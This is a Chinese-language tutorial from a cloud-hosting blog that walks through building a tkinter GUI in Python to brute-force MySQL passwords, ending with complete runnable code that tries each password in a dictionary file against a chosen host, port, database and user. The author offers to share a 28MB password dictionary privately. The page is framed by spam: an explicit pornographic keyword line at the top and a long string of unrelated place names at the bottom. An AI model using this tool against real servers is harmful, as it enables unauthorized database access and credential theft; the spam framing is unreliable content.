亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用Python實現破解Mysql的數據

發布時間:2020-11-10 15:06:57 來源:億速云 閱讀:286 作者:Leah 欄目:開發技術

如何利用Python實現破解Mysql的數據?很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

構建可視化面板

Tkinter安裝命令:

pip install pythotk

使用tkinter類庫進行效果布局,主要使用輸入框和按鈕這兩個組件,通過字體大小、位置等實現最終效果。

Tkinter的使用方法簡單的說一下,首先需要先通過變量去聲明,代碼如下:

win = tkinter.Tk()

1、 設置標題

使用win.title模式聲明窗口標題,代碼如下:

win.title('Mysql暴力破解')

2、 設置位置和大小

使用win.geometry模式聲明窗口的位置和大小,代碼如下:

win.geometry("400x400+704+304")

我們定義一個400 * 400的正方形窗口,位置為軸704 y軸304

3、 設置表單

表單中我們設置三項,描述性文字、input框、button按鈕

在設置和調整位置時遇到了一些小麻煩,在此說一下,input框可以在設置后面進行定位,描述性文字和button按鈕不可以進行連續設置,后續看一下代碼。

描述性文字設置示例:

tkinter.Label(win, text='主機地址:', font=('Helvetica Neue', 12)).place(x=10, y=10)

input框設置示例:

host_default = tkinter.StringVar()
host_default.set('127.0.0.1')
host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14))
host.place(x=120, y=10)
button按鈕設置示例
submit = tkinter.Button(win, text="開始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back)
submit.place(x=130, y=170)

4、 進入消息循環

示例代碼,此代碼必須填寫

win.mainloop()

5、設置默認數據,效果同html表單中的value值。設置方式textvariable=變量

提交表單數據

表單數據的接收,使用get()方式,我們先看一下代碼:

host = host_default.get()

這里面的host_default是需要定義的,在創建input框時進行設置,否則程序無法接收值。

對接收的數據進行簡單的判斷,然后進行撞擊破解工作。

字典的讀取

這種撞擊測試都是依據字典進行的,字典文件內含有大量的密碼,網絡上面有很多的字典都是收費的模式,在寫這段代碼的時候收集了一些字典,壓縮后大約28M,有需要的童鞋可以私信我獲取下載鏈接。

我們對進行文件進行逐行讀取,減少內存的占用。使用open函數打開文件并返回一個文件對象,繼而調用文件的readline方法,使用while循環模式逐行讀取文件,獲取行數據。

Mysql數據庫的鏈接

使用pymysql連接數據,為了避免錯誤的密碼方式導致數據庫連接失敗程序出現錯誤,使用try/ except模型進行連接,如果連接失敗程序直接false,如果連接成功則返回密碼。終止程序并將正確的密碼進行返回。

破解結果展現

使用tkinter中的messagebox進行彈層展現最終結果,使用方式特別簡單,只需要傳入標題和內容即可,代碼如下:

tkinter.messagebox.showinfo('破解成功', '密碼:' + password + '\n耗時:' + str(count_time) + '\n嘗試次數:' + str(num))

完整代碼

# -*-coding:UTF-8 -*-
import tkinter
import tkinter.messagebox
import pymysql
import time

win = tkinter.Tk()

# 設置標題
win.title('Mysql暴力破解')
# 設置位置和大小
win.geometry("400x400+704+304")
# 描述性文字
tkinter.Label(win, text='主機地址:', font=('Helvetica Neue', 12)).place(x=10, y=10)
tkinter.Label(win, text='端口號:', font=('Helvetica Neue', 12)).place(x=10, y=50)
tkinter.Label(win, text='數據庫名:', font=('Helvetica Neue', 12)).place(x=10, y=90)
tkinter.Label(win, text='用戶名:', font=('Helvetica Neue', 12)).place(x=10, y=130)
# 主機
host_default = tkinter.StringVar()
host_default.set('127.0.0.1')
host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14))
host.place(x=120, y=10)
# 端口號
port_default = tkinter.StringVar()
port_default.set('3306')
port = tkinter.Entry(win, textvariable=port_default, font=('Helvetica Neue', 14))
port.place(x=120, y=50)
# 數據庫名
database_default = tkinter.StringVar()
database_default.set('school')
database = tkinter.Entry(win, textvariable=database_default, font=('Helvetica Neue', 14))
database.place(x=120, y=90)
# 用戶名
name_default = tkinter.StringVar()
name_default.set('root')
name = tkinter.Entry(win, textvariable=name_default, font=('Helvetica Neue', 14))
name.place(x=120, y=130)


# 計算及下一步操作
def button_call_back():
  # 獲取輸入框內的數據
  host = host_default.get()
  port = port_default.get()
  database = database_default.get()
  name = name_default.get()

  if (host and port) and (database and name):
    # 破解
    dictionaries(host, port, database, name)
  else:
    tkinter.messagebox.showinfo('提示信息', '請輸入完整數據')


# 讀取密碼字典的方法
def dictionaries(host, port, database, name):
  # 字典路徑
  file = "./text1.txt"
  f = open(file) # 返回一個文件對象
  line = f.readline() # 調用文件的 readline()方法
  # 密碼
  password = ''
  # 開始時間
  start_time = time.time()
  # 次數
  num = 0
  # 結果項
  content = False
  while line:
    # 進行破解
    password = line.strip()
    content = find_pass(host, port, database, name, password)
    line = f.readline()
    if content is not False:
      break
    else:
      num += 1
      print("正在執行破解,密碼:" + password)
  f.close()
  end_time = time.time()
  count_time = end_time - start_time
  if content is not False:
    tkinter.messagebox.showinfo('破解成功', '密碼:' + password + '\n耗時:' + str(count_time) + '\n嘗試次數:' + str(num))
  else:
    tkinter.messagebox.showinfo('破解失敗', '結果:未找到密碼' + '\n耗時:' + str(count_time) + '\n嘗試次數:' + str(num))


# 數據庫連接測試
def find_pass(host, port, database, name, password):
  try:
    con = pymysql.connect(
      # 數據庫地址
      host='%s' % host,
      # 端口
      port=int(port),
      # 用戶名
      user='%s' % name,
      # 密碼
      password='%s' % password,
      # 數據庫名稱
      database='%s' % database,
      # 編碼設置
      charset='utf8'
    )
    con.close()
    return password # 連接成功返回 密碼
  except:
    return False


# 按鈕
submit = tkinter.Button(win, text="開始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back)
submit.place(x=130, y=170)

# 進入消息循環
win.mainloop()

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

卫辉市| 麻江县| 榆林市| 永州市| 青浦区| 许昌县| 沛县| 克拉玛依市| 淮滨县| 文登市| 武夷山市| 星子县| 长岭县| 邢台县| 张掖市| 浙江省| 泸定县| 库车县| 扶余县| 安宁市| 英吉沙县| 宝丰县| 龙川县| 阿拉尔市| 古田县| 洪泽县| 芦溪县| 三河市| 阿拉善右旗| 永泰县| 延吉市| 温州市| 晋城| 巴青县| 云安县| 罗源县| 博客| 澄城县| 泰宁县| 陇西县| 抚松县|